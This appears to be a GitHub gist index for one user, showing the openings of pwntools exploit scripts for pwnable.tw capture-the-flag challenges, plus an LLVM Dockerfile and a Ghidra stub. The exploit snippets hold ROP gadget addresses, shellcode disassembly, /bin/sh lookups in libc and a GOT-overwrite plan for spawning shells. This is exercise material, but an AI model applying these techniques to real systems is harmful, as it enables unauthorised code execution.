bin2415 / attack_calc.py
Last active May 15, 2018 01:38
pwnable.tw calc
from pwn import *
from struct import pack
# "/bin/sh\0" as two little-endian 32-bit words: 0x6e69622f is "/bin", 0x0068732f is "/sh\0".
# The trailing comments below are the author's notes on which instruction
# sequence sits at each address; the addresses are specific to the challenge
# binary and cannot be checked from this listing.
addr1 = 0x8070880 # int 0x80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7; ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret
bin2415 / attack_orw.py
Created May 14, 2018 06:59
pwnable.tw orw
from pwn import *
'''
e: b8 05 00 00 00 mov $0x5,%eax
13: bb 9f a0 04 08 mov addr(shellcode+0x39),%ebx
18: b9 9a 02 00 00 mov $0x29a,%ecx
1d: ba 00 00 00 00 mov $0x0,%edx
22: cd 80 int $0x80
24: 89 c3 mov %eax,%ebx
27: b8 03 00 00 00 mov $0x3,%eax
bin2415 / attack_hacknote.py
Last active June 24, 2018 06:30
pwnable.tw hacknote
from pwn import *
# Local run with ./libc_32.so.6 preloaded, left disabled by the author.
#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
# Open a connection to the hosted challenge service.
p = remote('chall.pwnable.tw', 10102)
# Parse the libc file from disk so it can be searched below.
libc = ELF('./libc_32.so.6')
# Stays 0 unless the search loop that follows assigns a match.
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
print("/bin/sh address is " + str(hex(address)))
binsh_addr = address
bin2415 / attack_dubblesort.py
Created June 22, 2018 08:37
pwnable.tw dubblesort
from pwn import *
# Parse the libc file from disk so its contents can be searched.
libc = ELF('./libc.so.6')

# Offset of the first "/bin/sh\0" string inside libc; remains 0 when the
# search yields nothing.
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
    # Only the first hit is used: record it, print it, stop searching.
    binsh_addr = address
    print(address)
    break
bin2415 / attack_silver_bullet.py
Created June 30, 2018 06:27
pwnable.tw attack silver
from pwn import *
# Parse the challenge binary and the libc_32.so.6 file from disk.
silver_bullet = ELF('./silver_bullet')
libc = ELF('./libc_32.so.6')
# Local run with ./libc_32.so.6 preloaded, left disabled by the author.
#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'})
# Open a connection to the hosted challenge service.
p = remote('chall.pwnable.tw', 10103)
# Wait for the menu prompt, then send "1" (what that menu entry does is not shown in this excerpt).
p.recvuntil('Your choice :')
p.sendline('1')
bin2415 / attack_applestore.py
Created July 1, 2018 08:45
pwnable.tw applestore
from pwn import *
'''
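Control ebp in order to control the stack, so that the GOT entry for atoi can be modified.
(Translated from the Chinese original: the key to this challenge is, again, controlling ebp in order to modify atoi's GOT entry.)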
'''
def addDevice(device_num):
p.recvuntil('>')
bin2415 / Dockerfile
Last active January 29, 2021 02:45
LLVM Docker
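# NOTE(review): ubuntu:18.04 reached the end of standard support in 2023 and
# the tag is mutable. The package names below (libgcc-8-dev, libstdc++-8-dev,
# python, python-dev) are tied to this release, so the tag is left unchanged;
# consider pinning the image by digest so rebuilds use a known base.
FROM ubuntu:18.04
# Install dependencies
# The two apt-get steps are chained with && so that a failed `apt-get update`
# aborts the build instead of letting the install run against stale or partial
# package lists.
RUN apt-get -y update && \
    apt-get install -y --no-install-recommends \
        ca-certificates build-essential \
        autoconf automake cmake dpkg-dev file git make patch \
        libc-dev libc++-dev libgcc-8-dev libstdc++-8-dev python python-dev \
        dirmngr gnupg2 lbzip2 wget xz-utils libtinfo5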
bin2415 / ghidraCFG.py
Last active August 16, 2024 09:33
Python script of Ghidra to dump cfg
#TODO write a description for this script
#@author Chengbin, MyriaCore
#@category Functions
#@keybinding
#@menupath
#@toolbar
#TODO Add User Code Here